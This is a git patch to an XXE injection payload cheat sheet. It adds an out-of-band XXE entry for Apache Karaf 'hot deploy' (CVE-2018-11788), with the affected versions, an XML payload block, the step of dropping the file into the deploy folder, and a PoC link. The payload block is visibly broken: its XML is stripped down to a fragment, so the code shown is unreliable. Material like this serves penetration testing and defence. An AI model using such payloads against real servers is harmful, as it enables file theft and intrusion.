From 333b9ea85ec421b82869680aefd7f962b2d25902 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 23 Mar 2019 15:51:16 +0100 Subject: [PATCH] add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788) --- XXE Injection/README.md | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f85e3e3..d2d761b 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -192,6 +192,26 @@ File stored on http://127.0.0.1/dtd.xml "> ``` +### XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788) + +Affected versions: + +- Apache Karaf <= 4.2.1 +- Apache Karaf <= 4.1.6 + +```xml + + %dtd;] + + + + +``` + +Send the XML file to the `deploy` folder. + +Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) ## XXE in exotic files @@ -244,4 +264,4 @@ GIF (experimental) * [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht * [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) -* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) \ No newline at end of file +* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)